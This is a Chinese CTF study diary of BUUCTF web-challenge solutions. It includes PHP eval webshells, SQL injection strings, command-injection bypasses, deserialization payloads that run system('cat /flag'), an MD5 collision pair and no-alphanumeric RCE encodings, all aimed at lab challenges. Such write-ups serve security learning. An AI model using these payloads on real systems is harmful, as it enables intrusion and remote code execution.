学习日记-5(buu) awovkj 2025-11-10 2026-01-10 [极客大挑战 2019]EasySQL 万能密码 admin' or 1=1# 密码随便
[极客大挑战 2019]Havefun 查看源码?cat=dog
[ACTF2020 新生赛]Include 直接伪协议
[HCTF 2018]WarmUp 查看源码发现source.php,然后有发现hint.php,发现ffffllllaaaagggg
1 ?file=source.php?../../../../../ffffllllaaaagggg
[ACTF2020 新生赛]Exec
[GXYCTF2019]Ping Ping Ping 通过尝试发现" ' ? * flag \ {等被禁
1 ?ip=127.0 .0.1 |cat$IFS `ls`;然后查看源码
[极客大挑战 2019]Secret File 查看源码发现/Archive_room.php,点击按钮后快速跳转网页,进行抓包发现
secr3t.php
使用伪协议
[ACTF2020 新生赛]BackupFile 使用dirsearch扫,发现/index.php.bak,下载后查看发现代码
<?php
// Challenge source (index.php.bak) as recovered in the writeup; intentionally weak.
// Root cause: `$key == $str` is a loose comparison between an int and a string
// that is not numeric. PHP 7 converts the string to int for that comparison,
// so the check does not pin the full secret; PHP 8 compares as strings instead.
// Mitigation: compare with `===` and never keep a secret in a web-served backup.
include_once "flag.php";
if (isset($_GET['key'])) {
    $key = $_GET['key'];
    // is_numeric() accepts floats, exponents and leading whitespace — it is not a digits-only check
    if (!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if ($key == $str) {
        echo $flag;
    }
} else {
    echo "Try to find out source file!";
}
[极客大挑战 2019]Upload 上传文件抓包,发现直接改后缀没用,修改Content-Type文件内容格式为image/png
尝试发现可以使用phtml作为后缀,同时过滤<?,将一句话木马改为
1 2 3 <script language="php" > @system ($_GET ['c' ]); </script>
发现还是不行,在前面添加一个GIF89a(相当于在16进制格式添加gif文件头)成功上传
1 2 3 **GIF89a**<script language="php" > @system ($_GET ['c' ]); </script>
访问/upload/1.phtml
[ACTF2020 新生赛]Upload 传简单的一句话木马的png抓包改为phtml
[MRCTF2020]你传你🐎呢 上传文件.htaccess
1 2 3 <FilesMatch "1.png" > SetHandler application/x-httpd-php </FilesMatch>
上传文件1.png
1 <?php @eval ($_POST [1 ]);?>
Content-Type: 都改为image/jpeg,蚁剑连接,根目录找到flag
[GXYCTF2019]BabyUpload 步骤与上一题一样,一句话木马改为
1 <script language="php" >@eval ($_POST [1 ]);</script>
[极客大挑战 2019]Knife 直接蚁剑连接,flag在根目录
[极客大挑战 2019]PHP 使用dirsearch扫发现/www.zip,下载解压发现是反序列化
<?php
// Challenge source (www.zip) as quoted in the writeup; intentionally weak.
// Root cause: a request-controlled string reaches unserialize(), so the magic
// methods below run with attacker-chosen property values. Mitigation: never
// unserialize() request data (use JSON) and keep __destruct() side-effect free.
class Name {
    private $username = 'admin';
    private $password = '100';

    public function __construct($username, $password) {
        $this->username = $username;
        $this->password = $password;
    }

    // Meant to demote every deserialized object to 'guest'. The writeup relies on
    // the property-count quirk: older PHP builds skip __wakeup() when the count
    // declared in the serialized string exceeds the real number of properties.
    function __wakeup() {
        $this->username = 'guest';
    }

    function __destruct() {
        // Loose comparison: the string '100' and the int 100 are equal here.
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;
            echo "</br>";
            echo "You password is: ";
            echo $this->password;
            echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        } else {
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
echo serialize(new Name('admin', 100));
?>
?>
利用对象属性个数的值大于真实属性个数绕过__wakeup()
1 O:4 :"Name" :3 :{s:14 :"%00Name%00username" ;s:5 :"admin" ;s:14 :"%00Name%00password" ;i:100 ;}
[极客大挑战 2019]BuyFlag 在payflag页面查看源码,发现相关信息
~post money and password~~~
// Fragment of the payflag page source as quoted in the writeup (no <?php tag shown).
// Root cause: `$password == 404` is a loose comparison; on PHP 7 a string with a
// numeric prefix converts to int for the comparison, and is_numeric() only rejects
// strings that are numeric as a whole. Mitigation: compare with `===` against a
// string, or validate with ctype_digit() and cast explicitly before comparing.
if (isset($_POST['password'])) {
    $password = $_POST['password'];
    if (is_numeric($password)) {
        echo "password can't be number</br>";
    } elseif ($password == 404) {
        echo "Password Right!</br>";
    }
}
直接传发现没反应,用bp抓包,传了还是没反应,看见cookie:user=0,改为1
提示Nember lenth is too long
改为科学计数法
1 money=10e8 &password=404 a
[RoarCTF 2019]Easy Calc 查看源码发现calc.php
利用%20绕过对num的检测,查看phpinfo()可以看到禁用函数
利用chr函数构造进行绕过
1 2 ?%20 num=print_r (scandir (chr (0x2f )));
1 2 file_get_contents (chr (0x2f ).chr (0x66 ).chr (0x31 ).chr (0x61 ).chr (0x67 ).chr (0x67 ));
[HCTF 2018]admin 直接爆破,密码是123
[ZJCTF 2019]NiZhuanSiWei
<?php
// Challenge source as quoted in the writeup; intentionally weak.
// Three request parameters flow into file_get_contents(), include() and
// unserialize() without validation. The "/flag/" filter is a denylist on the
// path only; stream wrappers (data://, php://filter) still satisfy both checks.
// Mitigation: allowlist include targets, keep allow_url_include off, and never
// unserialize() request data.
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
// Second argument 'r' is file_get_contents()'s use_include_path flag, not a mode.
if (isset($text) && (file_get_contents($text, 'r') === "welcome to the zjctf")) {
    echo "<br><h1>" . file_get_contents($text, 'r') . "</h1></br>";
    if (preg_match("/flag/", $file)) {
        echo "Not now!";
        exit();
    } else {
        include($file);
        // Any class pulled in by include() above can have its __toString() run by this echo.
        $password = unserialize($password);
        echo $password;
    }
} else {
    highlight_file(__FILE__);
}
?>
通过data协议包含输入流然后利用伪协议读取useless.php
解码后得到
<?php
// useless.php as recovered in the writeup.
class Flag {
    public $file;

    // __toString() reads whatever path is in $file and echoes it; when $file is
    // set through unserialize() this is an arbitrary file read. When $file is
    // unset nothing is returned, which PHP treats as an error for __toString().
    public function __tostring() {
        if (isset($this->file)) {
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
<?php
// Writeup helper: serializes a Flag object whose $file is flag.php, producing the
// string used for ?password=. It only works because the target passes that
// parameter to unserialize() — the fix belongs on the target side.
class Flag {
    public $file = 'flag.php';
    public function __tostring() {
        if (isset($this->file)) {
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
echo serialize(new Flag);
?>
即可
[MRCTF2020]Ez_bypass 1 2 ?id[]=a&gg[]=s; passwd=1234567 a
即可
[网鼎杯 2020 青龙组]AreUSerialz
<?php
// Challenge source as quoted in the writeup; intentionally weak.
// Root cause: ?str= reaches unserialize(); __destruct() then runs process() with
// caller-chosen $op/$filename, so read() becomes an arbitrary file read (php://
// wrappers included). Mitigation: never unserialize() request data, keep I/O out
// of destructors, and allowlist readable paths.
include("flag.php");
highlight_file(__FILE__);

class FileHandler {
    protected $op;
    protected $filename;
    protected $content;

    // Assigns locals, not $this->op etc. — the properties stay null here.
    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    // Loose "==" on $op: the integer 2 also selects the read branch.
    public function process() {
        if ($this->op == "1") {
            $this->write();
        } else if ($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if (isset($this->filename) && isset($this->content)) {
            if (strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if ($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if (isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    // Strict "===" resets only the string "2"; an integer 2 survives this reset
    // and still passes the loose check in process() — the mismatch the writeup uses.
    function __destruct() {
        if ($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }
}

// Rejects bytes outside 32..125, which excludes the NUL bytes that mark
// protected/private property names in a serialized string.
function is_valid($s) {
    for ($i = 0; $i < strlen($s); $i++)
        if (!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if (isset($_GET{'str'})) {
    $str = (string)$_GET['str'];
    if (is_valid($str)) {
        $obj = unserialize($str);
    }
}
可以发现如果要触发flag
<?php
// Writeup's first attempt: declares the object with protected properties.
// serialize() then emits "\0*\0" name prefixes, which the target's is_valid()
// rejects (bytes below 32), so this payload cannot pass the filter.
class FileHandler {
    protected $op = 2;
    protected $filename = 'php://filter/convert.base64-encode/resource=flag,php';
    protected $content;
}
echo serialize(new FileHandler());
由于is_valid($s)限制,无法成功获取flag
php7.1+ 的 unserialize() 对属性的访问修饰符(public/protected/private)不敏感,因此可以改用 public 属性生成不含空字节的序列化字符串
<?php
// Same object with public properties: the serialized string contains no NUL
// bytes, so the target's is_valid() accepts it. Defensive takeaway: a byte
// filter on a serialized string is not a control; do not unserialize() input.
class FileHandler {
    public $op = 2;
    public $filename = 'php://filter/convert.base64-encode/resource=flag,php';
    public $content;
}
echo serialize(new FileHandler());
解密即可
[NPUCTF2020]ReadlezPHP 查看源码,发现time.php?source
<?php
// time.php source as quoted in the writeup; intentionally weak.
// Root cause: ?data= is passed to unserialize(); __destruct() then calls
// $this->b($this->a), i.e. a caller-chosen function with a caller-chosen
// argument. Mitigation: no unserialize() on input; never build a callable from
// object state that can be set externally. The @ only hides the warning.
class HelloPhp {
    public $a;
    public $b;
    public function __construct() {
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct() {
        $a = $this->a;
        $b = $this->b;
        echo $b($a);   // dynamic call: $b is used as a function name
    }
}
$c = new HelloPhp;
if (isset($_GET['source'])) {
    highlight_file(__FILE__);
    die(0);
}
@$ppp = unserialize($_GET["data"]);
assert是php之中的断言,如果传入的是字符串则会把它作为php代码执行
<?php
// Writeup helper: serializes a HelloPhp whose __destruct() will evaluate $b($a)
// on the target. The target's weakness (unserialize() of ?data=) is what needs
// fixing; note that PHP 8 assert() no longer evaluates string arguments as code.
class HelloPhp {
    public $a;
    public $b;
    public function __construct() {
        $this->a = "phpinfo()";
        $this->b = "assert";
    }
    public function __destruct() {
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;
echo serialize($c);
[BSidesCF 2020]Had a bad day 随便点一点发现?category=woofers,猜测直接命令执行,结果显示Sorry, we currently only support woofers and meowers.并且后面会拼接.php尝试截断发现Warning : include()…
应该就是文件包含,然后直接伪协议
[网鼎杯 2020 朱雀组]phpweb 抓包发现参数尝试看目录失败,尝试看文件
1 func=file_get_contents&p=index.php
<?php
// index.php source as quoted in the writeup; intentionally weak.
// Root cause: call_user_func() on a request-supplied function name, guarded only
// by a denylist. The denylist omits unserialize, and Test::__destruct() feeds
// object state back into gettime(), which is the path the writeup's next step
// relies on. Mitigation: allowlist the callables, never unserialize() input.
$disable_fun = array("exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg", "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter", "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function", "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents");

// Calls $func($p) and returns the result only when it is a string.
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}

class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    // Harmless for the defaults; not for an instance restored from caller data.
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);   // case-folded before the (non-strict) in_array check
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}
应该是反序列化
<?php
// Writeup helper: serializes a Test object that, once restored on the target,
// makes __destruct() call gettime("system", "ls"). The two $_REQUEST lines are
// copied from the target source and are not used by this script.
class Test {
    var $p = "ls";
    var $func = "system";
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
echo serialize(new Test());
慢慢找,发现在 /tmp/flagoefiu4r93
<?php
// Same helper with $p pointed at the file located above.
class Test {
    var $p = "cat /tmp/flagoefiu4r93";
    var $func = "system";
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
echo serialize(new Test());
[BJDCTF2020]The mystery of ip 在flag.php看见ip,尝试修改XFF(X-Forwarded-For)头发现会回显修改的值,猜测是ssti
1 2 {{system ('ls /' )}} {{system ('cat /flag' )}}
[极客大挑战 2019]BabySQL 通过1' 1=2--+发现是字符型注入,尝试发现有3列
通过爆破发现or and from ,select union where等会被替换为空
1 2 3 4 5 6 7 8 9 10 11 12 查看当前数据库,发现是geek 1 ' uunionnion sselectelect 1,2,database()--+ 查看所有数据库, Your password is ' information_schema,performance_schema,test,mysql,ctf,geek' 1' uunionnion sselectelect 1 ,2 ,group_concat (schema_name) ffromrom infoorrmation_schema.schemata--+查看ctf中表名Your password is 'Flag' 1 ' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema=' ctf'--+1' uunionnion sselectelect 1 ,2 ,flag ffromrom ctf.Flag--+查看列名Your password is 'flag 1' uunionnion sselectelect 1 ,2 ,group_concat (column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='Flag' --+查看flag 1 ' uunionnion sselectelect 1,2,flag ffromrom ctf.Flag--+
[SUCTF 2019]EasySQL 通过爆破发现union,from,and,or,information等被禁
输入1,2,3时发现
Array ( [0] => 1 [1] => 2 [2] => 1 ) 按理说最后应该是3,但是为什么是1呢
当查询时进行逻辑运算时会出现这种情况
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 mysql> select * from ctf; +------+------+------+-------------+ | 1 | 2 | 3 | flag | +------+------+------+-------------+ | 1 | 2 | 3 | flag{sanye} | | 1 | 2 | 3 | | | 1 | 2 | 3 | | | 1 | 2 | 3 | | | 1 | 2 | 3 | | | | | 3 | | +------+------+------+-------------+ mysql> select 1 ,2 ,3 ||flag from ctf; +---+---+---------+ | 1 | 2 | 3 ||flag | +---+---+---------+ | 1 | 2 | 1 | | 1 | 2 | 1 | | 1 | 2 | 1 | | 1 | 2 | 1 | | 1 | 2 | 1 | | 1 | 2 | 1 | +---+---+---------+ mysql> select 1 ,2 ,3 &&flag from ctf; +---+---+---------+ | 1 | 2 | 3 &&flag | +---+---+---------+ | 1 | 2 | 0 | SQL语言进行逻辑运算时以非数字字符开头的字符串始终被转为 0 | 1 | 2 | 0 | | 1 | 2 | 0 | | 1 | 2 | 0 | | 1 | 2 | 0 | | 1 | 2 | 0 | +---+---+---------+ 所以可以通过*,1 得到flag 当后面是||flag就可以通过set sql_mode=PIPES_AS_CONCAT将管道符 || 变成字符串连接运算符获得flag 1 ;set sql_mode=PIPES_AS_CONCAT;select 1
[极客大挑战 2019]LoveSQL 判断为字符型注入,闭合符为',列数为3,使用union注入
1 2 3 4 5 6 7 8 获取库名 1 ' union select 1,2,database()# Your password is ' geek' 获取表名 Your password is ' geekuser,l0ve1ysq1' 1' union select 1 ,2 ,group_concat (table_name) from information_schema.tables where table_schema='geek' 获取列名 Your password is 'id,username,password' 1 ' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=' l0ve1ysq1'# 获取username,password得到flag 1' union select 1 ,2 ,group_concat (username,password) from l0ve1ysq1
[GXYCTF2019]BabySQli 字符型注入,'闭合,有3列,查看源码发现有大串编码,解密得到:select * from user where username = '$name'
传入admin发现会由之前wrong user变为wrong pass 说明有admin账户
通过
1 1 ' union select 1 ,'admin' ,2
看一篇wp说直接猜测search.php源码,直接人麻了,翻了几篇博客才发现题目那里可以看源码
会对传入的密码进行MD5加密然后与数据库的密码对比,若为真就输出flag
联合查询并不存在的数据时,联合查询就会构造一个 虚拟的数据表
1 2 3 4 5 6 7 8 9 10 11 mysql> select * from ctf union select 'admin' ,1 ,flag,3 from ctf -> ; +-------+------+--------------+--------------+ | 1 | 2 | 3 | flag | +-------+------+--------------+--------------+ | 1 | 2 | 3 | 1 flag{sanye} | | 1 | 2 | 3 | | | | | 3 | | | admin | 1 | 1 flag{sanye} | 3 | | admin | 1 | | 3 | +-------+------+--------------+--------------+
1 name=1 ' union select 1,' admin',' c4ca4238a0b923820dcc509a6f75849b'#&pw=1
[安洵杯 2019]easy_web 抓包发现?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= CyberChef解码发现是555.png尝试读取index.php,进行hex加密然后两次base64
将结果解码
<?php
// index.php source as quoted in the writeup; intentionally weak.
// Two issues: (1) ?img= is decoded into a path for file_get_contents() with only
// a "flag" denylist, so other files (this source included) can be read;
// (2) ?cmd= is executed with backticks behind a character denylist and an
// md5() === md5() check that treats two different inputs with equal digests as
// authorization. Mitigation: allowlist image names, never pass request data to
// a shell, and do not gate anything on hash equality of caller-supplied values.
error_reporting(E_ALL || ~E_NOTICE);   // "||" yields bool true (1), not the intended bit mask
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);   // strips "/" — path is a bare file name
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    // The (string) casts rule out array inputs; the check still passes for any
    // two distinct strings with the same MD5 digest (MD5 is not collision resistant).
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd `;   // shell execution via backtick operator
    } else {
        echo("md5 is funny ~");
    }
}
?>
<html>
<style>
body{
    background:url (./bj.png) no-repeat center center;
    background-size:cover;
    background-attachment:fixed;
    background-color:
}
</style>
<body>
</body>
</html>
利用\绕过命令的过滤,由于进行了类型转换,不能使用数组
使用以下进行md5强比较绕过
1 2 3 4 5 6 7 8 %4 d%c9%68 %ff%0 e%e3%5 c%20 %95 %72 %d4%77 %7 b%72 %15 %87 %d3%6 f%a7%b2%1 b%dc%56 %b7%4 a%3 d%c0%78 %3 e%7 b%95 %18 %af%bf%a2%02 %a8%28 %4 b%f3%6 e%8 e%4 b%55 %b3%5 f%42 %75 %93 %d8%49 %67 %6 d%a0%d1%d5%5 d%83 %60 %fb%5 f%07 %fe%a2 与 %4 d%c9%68 %ff%0 e%e3%5 c%20 %95 %72 %d4%77 %7 b%72 %15 %87 %d3%6 f%a7%b2%1 b%dc%56 %b7%4 a%3 d%c0%78 %3 e%7 b%95 %18 %af%bf%a2%00 %a8%28 %4 b%f3%6 e%8 e%4 b%55 %b3%5 f%42 %75 %93 %d8%49 %67 %6 d%a0%d1%55 %5 d%83 %60 %fb%5 f%07 %fe%a2 或者 M%C9h%FF%0 E%E3%5 C%20 %95 r%D4w%7 Br%15 %87 %D3o%A7%B2%1 B%DCV%B7J%3 D%C0x%3 E%7 B%95 %18 %AF%BF%A2%02 %A8%28 K%F3n%8 EKU%B3_Bu%93 %D8Igm%A0%D1%D5%5 D%83 %60 %FB_%07 %FE%A2 与 M%C9h%FF%0 E%E3%5 C%20 %95 r%D4w%7 Br%15 %87 %D3o%A7%B2%1 B%DCV%B7J%3 D%C0x%3 E%7 B%95 %18 %AF%BF%A2%00 %A8%28 K%F3n%8 EKU%B3_Bu%93 %D8Igm%A0%D1U%5 D%83 %60 %FB_%07 %FE%A2
[BJDCTF2020]ZJCTF,不过如此 通过php://input,php://filter进行绕过
抓包传入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /?text=php: Host: f340604a-c708-463 c-a700-82 cac6784ae3.node5.buuoj.cn:81 Content-Length: 14 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0 .0.0 Safari/537.36 Origin: http: Content-Type: text/plain Accept: text/html,application/xhtml+xml,application/xml;q=0.9 ,image/avif,image/webp,image/apng,*
将结果解码
<?php
// next.php source as quoted in the writeup; intentionally weak.
// Root cause: complex() builds a preg_replace() pattern from the request
// parameter *name* and uses the /e modifier, which evaluates the replacement as
// PHP after back-reference substitution (deprecated in PHP 5.5, removed in 7.0).
// Mitigation: use preg_replace_callback() and never interpolate input into patterns.
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}

// Every query parameter: the key becomes the pattern, the value the subject.
foreach ($_GET as $re => $str) {
    echo complex($re, $str) . "\n";
}

// Not called directly anywhere in this file; reachable only through the /e evaluation above.
function getFlag() {
    @eval($_GET['cmd']);
}
获取第一个get传入的参数与它的值,通过正则\S*绕过
1 next.php?\S*=${getFlag ()}&cmd=system ('cat /flag' );
函数名
用途
作用对象
示例
处理效果
escapeshellarg()
安全转义参数
单个参数值
ls 'abc; rm -rf /'
加引号包裹 + 内部转义
escapeshellcmd()
安全转义整个命令行
整条命令
ls\; cat /etc/passwd
特殊字符前加反斜杠
1 2 3 4 两函数escapeshellarg (),escapeshellcmd ():先后调用会导致漏洞的产生 通过nmap 的-oG参数将代码与命令写到文件中 ?host=' <?php echo `cat /flag`;?> -oG 1.php ' 访问e6305cd14dbe6e1fc4041d81cb3fc9ee/1 .php即可得到flag
[极客大挑战 2019]RCE ME 无数字字母rce,通过取反构造进行绕过
1 2 3 4 5 6 <?php echo "(~" ,urlencode (~'phpinfo' ),')' ,'();' ;?code=(~%8 F%97 %8 F%96 %91 %99 %90 )();查看phpinfo eval 不是php函数不能直接用通过构造assert (eval ($_POST [1 ])); ?code (~%9 E%8 C%8 C%9 A%8 D%8 B)(~%D7%9 A%89 %9 E%93 %D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%D6);
使用蚁剑连接,flag在根目录但是看不到,通过插件绕过disable_functions执行/readflag得到flag
[网鼎杯 2018]Fakebook 注册账号并可以成功登录,发现?no=1尝试命令执行发现
[*] query error! (Unknown column 'ls' in 'where clause')
是sql注入
1 2 3 4 5 6 7 8 9 10 ?no=1 and 1 =2 会报错是数字型注入 ?no=1 group by 4 正常,5 报错,有4 列 看wp,union select被禁,通过绕过 ?no=-1 unionselect 1 ,2 ,3 ,4 --+发现会回显位2 no=-1 unionselect 1 ,database (),3 ,4 --+ fakebook ?no=-1 unionselect 1 ,group_concat (table_name),2 ,3 from information_schema.tables where table_schema='fakebook' --+ 表:users ?no=-1 unionselect 1 ,group_concat (column_name),2 ,3 from information_schema.columns where table_name='users' --+ no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS ?no=-1 unionselect 1 ,group_concat (username,passwd,data),2 ,3 from users --+
最后发现
sanye4e2e603ad32bb2e1335b383c6d4b9a6d353cca643f2808e389a06cb1af930dd661ba77ad76061192ef5baf562297bcc6aeb5e9580c7f6f7ec6b7a353fc96d03d
O:8:"UserInfo":3:{s:4:"name";s:5:"sanye";s:3:"age";i:18;s:4:"blog";s:5:"4.com";} wp说有robots.txt,得到user.php.bak
<?php
// user.php.bak as recovered in the writeup.
class UserInfo {
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog) {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    // Fetches $url with cURL and returns the body (or the int 404).
    // Security notes: the URL scheme is not restricted, so file:// and other
    // wrappers are reachable (SSRF / local file read) — CURLOPT_PROTOCOLS can
    // limit it; and on the 404 path the handle is returned without curl_close().
    function get($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if ($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
        return $output;
    }

    public function getBlogContents() {
        return $this->get($this->blog);
    }

    // get() never calls this, so an object whose $blog was set directly (e.g. one
    // restored by unserialize(), as in the writeup) is fetched without validation.
    public function isValidBlog() {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}
<?php
// Writeup helper: serializes a UserInfo whose $blog is a file:// URL; the
// serialized string is injected through the SQL union so the target's
// unserialize() + get() reads the file. Target-side fix: restrict cURL
// protocols and never unserialize() data that a request can influence.
class UserInfo {
    public $name = "sanye";
    public $age = 18;
    public $blog = "file:///var/www/html/flag.php";
}
echo serialize(new UserInfo());
通过反序列化写入file://伪协议进行读取flag
1 ?no=-1 %20 unionselect%201 ,2 ,3 ,%27 O:8 :%22 UserInfo%22 :3 :{s:4 :%22 name%22 ;s:5 :%22 sanye%22 ;s:3 :%22 age%22 ;i:18 ;s:4 :%22 blog%22 ;s:29 :%22 file: